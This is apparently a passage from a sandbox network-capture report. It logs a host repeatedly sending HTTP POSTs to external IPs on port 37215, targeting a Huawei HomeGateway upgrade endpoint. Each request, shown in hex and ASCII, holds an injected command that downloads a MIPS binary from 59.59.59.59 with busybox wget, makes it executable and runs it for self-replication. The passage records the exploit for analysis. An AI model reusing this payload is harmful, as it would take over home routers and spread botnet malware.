                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          955192.168.2.1552072157.109.237.13637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.714793921 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          956192.168.2.1542740157.61.235.13737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.714884996 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          957192.168.2.155621041.155.236.2937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.717616081 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          958192.168.2.1533408197.104.52.8937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.717730999 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          959192.168.2.1540752157.224.133.2137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.717910051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          960192.168.2.156083263.196.78.13337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.717946053 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          961192.168.2.1551782179.164.125.14537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.718019962 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          962192.168.2.155309841.1.196.14637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.719407082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          963192.168.2.1544900137.8.83.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.719506979 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          964192.168.2.153457441.141.96.4137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.719547987 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
